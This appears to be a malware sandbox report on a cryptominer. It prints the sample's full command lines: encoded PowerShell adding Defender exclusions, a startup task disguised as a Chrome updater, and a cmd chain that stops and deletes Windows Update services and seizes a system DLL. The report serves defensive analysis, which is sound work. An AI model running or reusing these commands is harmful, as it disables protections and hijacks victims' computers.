Analysis
-
max time kernel
117s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
13-11-2022 14:43
General
-
Target
6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe
-
Size
2.6MB
-
MD5
b5d020046c84c4cc22ce979dce7b53bf
-
SHA1
a76f5ea5ab510492f4e322fece1e826c16955045
-
SHA256
6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28
-
SHA512
a834168b2e9475265b7f1b44d1606570119deaa0bd6bd5dbc36e9b7beb015393d03fecdad8e0fd15364c3fc004173f55a307e81623e651aab5c191fd3f929b2d
-
SSDEEP
49152:u+3fG3P8gy3i7wyLsdPPHMCsh8b1wvFCysv6uuCZxfllJjM3KL6hU0A7vO4GIdED:u+u0gy3McPHRsVkysNuAlM3+nvSIdED
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Executes dropped EXE 2 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Temp\miner2.exe"C:\Windows\Temp\miner2.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAFkAQQBkAEEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGEAdwBCAHEAQQBIAGsAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAZwBsAHAAbwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGgAeQBjAGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHYAawBjACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAbQBpAG4AZQByADIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAGIAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAHQAcABhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGYAdAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAawBqAHkAIwA+AA=="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "duhwxeji"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.5MB
MD5b4e0599f4aa2a201d2321a93d34f30b2
SHA10747c2e020ca9d158c6733c839affd843fd97232
SHA256f3e536e18d8fdde117a27d2051668ffca0dc7ccf29ae0fbcea53c04b39c72229
SHA5122e47455e15644d2a00c636f8928d30eec8dc9ef8615305d2531b9adc3fe95f7b52e0caedb57a7c85868fcf87f1561b1e2110e34713ef171ae4f6508c279ec0ef
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.5MB
MD5b4e0599f4aa2a201d2321a93d34f30b2
SHA10747c2e020ca9d158c6733c839affd843fd97232
SHA256f3e536e18d8fdde117a27d2051668ffca0dc7ccf29ae0fbcea53c04b39c72229
SHA5122e47455e15644d2a00c636f8928d30eec8dc9ef8615305d2531b9adc3fe95f7b52e0caedb57a7c85868fcf87f1561b1e2110e34713ef171ae4f6508c279ec0ef
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5e78aab58687761255706892240d901b1
SHA1059d227e8db43441ac2c5e74ac660232b5226132
SHA256b375f751c588c3e7ae84b2b1671d60dacb4e10c71ffe122a7c6871b463d5d4c6
SHA51278043273ef74f88c9885c689453902f4cc1b9b8a84df220009d0efaa0746047e030a684afc716351162506b89322c793d45790508bdb74e6bfab58c3f7ad9369
-
C:\Windows\Temp\miner2.exeFilesize
2.5MB
MD5b4e0599f4aa2a201d2321a93d34f30b2
SHA10747c2e020ca9d158c6733c839affd843fd97232
SHA256f3e536e18d8fdde117a27d2051668ffca0dc7ccf29ae0fbcea53c04b39c72229
SHA5122e47455e15644d2a00c636f8928d30eec8dc9ef8615305d2531b9adc3fe95f7b52e0caedb57a7c85868fcf87f1561b1e2110e34713ef171ae4f6508c279ec0ef
-
C:\Windows\Temp\miner2.exeFilesize
2.5MB
MD5b4e0599f4aa2a201d2321a93d34f30b2
SHA10747c2e020ca9d158c6733c839affd843fd97232
SHA256f3e536e18d8fdde117a27d2051668ffca0dc7ccf29ae0fbcea53c04b39c72229
SHA5122e47455e15644d2a00c636f8928d30eec8dc9ef8615305d2531b9adc3fe95f7b52e0caedb57a7c85868fcf87f1561b1e2110e34713ef171ae4f6508c279ec0ef
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
memory/220-202-0x0000000000000000-mapping.dmp
-
memory/448-213-0x0000000000000000-mapping.dmp
-
memory/524-220-0x0000000000000000-mapping.dmp
-
memory/628-143-0x0000000000000000-mapping.dmp
-
memory/824-158-0x0000000000000000-mapping.dmp
-
memory/880-207-0x0000000000000000-mapping.dmp
-
memory/896-177-0x0000000000000000-mapping.dmp
-
memory/996-218-0x0000000000000000-mapping.dmp
-
memory/1068-199-0x0000000000000000-mapping.dmp
-
memory/1204-153-0x0000000000000000-mapping.dmp
-
memory/1424-206-0x0000000000000000-mapping.dmp
-
memory/1592-151-0x0000000000000000-mapping.dmp
-
memory/1592-215-0x0000000000000000-mapping.dmp
-
memory/1688-132-0x0000000000F90000-0x0000000001226000-memory.dmpFilesize
2.6MB
-
memory/1700-208-0x0000000000000000-mapping.dmp
-
memory/1720-170-0x0000000000000000-mapping.dmp
-
memory/1748-176-0x0000000000000000-mapping.dmp
-
memory/2324-150-0x0000000000000000-mapping.dmp
-
memory/2344-227-0x0000000000000000-mapping.dmp
-
memory/2368-171-0x0000000000000000-mapping.dmp
-
memory/2392-217-0x0000000000000000-mapping.dmp
-
memory/2612-204-0x0000000000000000-mapping.dmp
-
memory/2636-183-0x00007FFECEF20000-0x00007FFECF9E1000-memory.dmpFilesize
10.8MB
-
memory/2636-179-0x00007FFECEF20000-0x00007FFECF9E1000-memory.dmpFilesize
10.8MB
-
memory/2756-200-0x0000000000000000-mapping.dmp
-
memory/2768-173-0x0000000000000000-mapping.dmp
-
memory/2772-223-0x0000000000000000-mapping.dmp
-
memory/2772-156-0x0000000000000000-mapping.dmp
-
memory/2836-181-0x0000000000000000-mapping.dmp
-
memory/2836-214-0x00007FFECEF20000-0x00007FFECF9E1000-memory.dmpFilesize
10.8MB
-
memory/2836-185-0x00007FFECEF20000-0x00007FFECF9E1000-memory.dmpFilesize
10.8MB
-
memory/2836-198-0x00007FFECEF20000-0x00007FFECF9E1000-memory.dmpFilesize
10.8MB
-
memory/2984-211-0x0000000000000000-mapping.dmp
-
memory/3056-137-0x0000000000000000-mapping.dmp
-
memory/3056-141-0x00007FFECED60000-0x00007FFECF821000-memory.dmpFilesize
10.8MB
-
memory/3056-140-0x00007FFECED60000-0x00007FFECF821000-memory.dmpFilesize
10.8MB
-
memory/3056-139-0x000002278B010000-0x000002278B032000-memory.dmpFilesize
136KB
-
memory/3076-222-0x0000000000000000-mapping.dmp
-
memory/3244-154-0x0000000000000000-mapping.dmp
-
memory/3244-219-0x0000000000000000-mapping.dmp
-
memory/3264-191-0x00000227515D0000-0x00000227515EC000-memory.dmpFilesize
112KB
-
memory/3264-190-0x00007FFECEF20000-0x00007FFECF9E1000-memory.dmpFilesize
10.8MB
-
memory/3264-195-0x00000227515C0000-0x00000227515C6000-memory.dmpFilesize
24KB
-
memory/3264-194-0x00000227515B0000-0x00000227515B8000-memory.dmpFilesize
32KB
-
memory/3264-188-0x000002274F980000-0x000002274F99C000-memory.dmpFilesize
112KB
-
memory/3264-193-0x00000227515F0000-0x000002275160A000-memory.dmpFilesize
104KB
-
memory/3264-192-0x000002274F9A0000-0x000002274F9AA000-memory.dmpFilesize
40KB
-
memory/3264-196-0x0000022751610000-0x000002275161A000-memory.dmpFilesize
40KB
-
memory/3264-184-0x0000000000000000-mapping.dmp
-
memory/3264-189-0x000002274F970000-0x000002274F97A000-memory.dmpFilesize
40KB
-
memory/3264-197-0x00007FFECEF20000-0x00007FFECF9E1000-memory.dmpFilesize
10.8MB
-
memory/3308-147-0x0000000000000000-mapping.dmp
-
memory/3308-210-0x0000000000000000-mapping.dmp
-
memory/3340-155-0x0000000000000000-mapping.dmp
-
memory/3676-216-0x0000000000000000-mapping.dmp
-
memory/3700-174-0x0000000000000000-mapping.dmp
-
memory/3836-166-0x00007FFECED60000-0x00007FFECF821000-memory.dmpFilesize
10.8MB
-
